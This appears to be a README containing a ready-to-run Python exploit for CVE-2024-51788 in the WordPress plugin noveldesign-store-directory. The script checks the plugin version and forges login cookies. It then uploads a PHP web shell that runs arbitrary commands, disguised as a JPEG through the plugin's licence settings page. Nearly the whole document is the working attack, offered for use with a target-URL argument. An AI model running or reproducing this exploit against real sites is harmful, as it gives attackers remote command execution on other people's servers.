README.md
Rendering markdown...
print('''
:'######::'##::::'##:'########:::::::::::'#######::::'#####::::'#######::'##:::::::::::::::::'########::::'##:::'########::'#######:::'#######::
'##... ##: ##:::: ##: ##.....:::::::::::'##.... ##::'##.. ##::'##.... ##: ##:::'##::::::::::: ##.....:::'####::: ##.. ##:'##.... ##:'##.... ##:
##:::..:: ##:::: ##: ##::::::::::::::::..::::: ##:'##:::: ##:..::::: ##: ##::: ##::::::::::: ##::::::::.. ##:::..:: ##::: ##:::: ##: ##:::: ##:
##::::::: ##:::: ##: ######:::'#######::'#######:: ##:::: ##::'#######:: ##::: ##::'#######: #######::::: ##:::::: ##::::: #######::: #######::
##:::::::. ##:: ##:: ##...::::........:'##:::::::: ##:::: ##:'##:::::::: #########:........:...... ##:::: ##::::: ##:::::'##.... ##:'##.... ##:
##::: ##::. ## ##::: ##:::::::::::::::: ##::::::::. ##:: ##:: ##::::::::...... ##:::::::::::'##::: ##:::: ##::::: ##::::: ##:::: ##: ##:::: ##:
. ######::::. ###:::: ########:::::::::: #########::. #####::: #########::::::: ##:::::::::::. ######:::'######::: ##:::::. #######::. #######::
:......::::::...:::::........:::::::::::.........::::.....::::.........::::::::..:::::::::::::......::::......::::..:::::::.......::::.......:::
''')
# Exploit By: Coded By : Nxploit | Khaled ALenazi,
import requests
import random
import string
import argparse
from urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
UPLOAD_DIR = "/wp-content/plugins/noveldesign-store-directory/images/"
USER_AGENT = (
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) "
"Chrome/113.0.0.0 Safari/537.36"
)
def generate_random_cookie():
return ''.join(random.choices(string.ascii_letters + string.digits, k=64))
def check_version(target_url):
url_version = f"{target_url}/wp-content/plugins/noveldesign-store-directory/readme.txt"
response = requests.get(url_version, verify=False, headers={"User-Agent": USER_AGENT})
if response.status_code == 200:
if "Stable tag: 4.3.0" in response.text or "Stable tag: 4." in response.text:
print("[✔] Target is vulnerable! Continuing exploitation...\n")
return True
print("[✘] Target does not appear to be vulnerable. Exiting.\n")
return False
print("[!] Could not verify version. Proceeding with exploitation...\n")
return True
def upload_shell(target_url):
upload_url = f"{target_url}/wp-admin/options-general.php?page=licence"
cookies = {
"wordpress_logged_in": generate_random_cookie(),
"wp_lang": "en_US",
"wp-settings-1": "libraryContent=browse&urlbutton=post&hidetb=1",
"wp-settings-time-1": str(random.randint(1600000000, 1800000000)),
}
shell_name = f"Nxploit_{random.randint(1000, 9999)}.php"
shell_content = "<?php system($_GET['cmd']); ?>"
files = {
"default_shop_image": (shell_name, shell_content, "image/jpeg"),
"btn_default_shop_image": (None, "Upload"),
}
session = requests.Session()
session.verify = False
response = session.post(upload_url, files=files, cookies=cookies, headers={"User-Agent": USER_AGENT})
if response.status_code == 200:
print("[✔] Web Shell successfully uploaded!")
print(f" [+] Shell is located in: {UPLOAD_DIR}\n")
else:
print("[✘] Exploit failed. Server did not respond as expected.\n")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Exploit script for CVE-2024-51788 by Nxploit Khaled Alenazi.')
parser.add_argument('-u', '--url', required=True, help='Target URL')
args = parser.parse_args()
target = args.url.rstrip('/')
print(f"[*] Checking if {target} is vulnerable...\n")
if check_version(target):
print("[*] Attempting to upload Web Shell...\n")
upload_shell(target)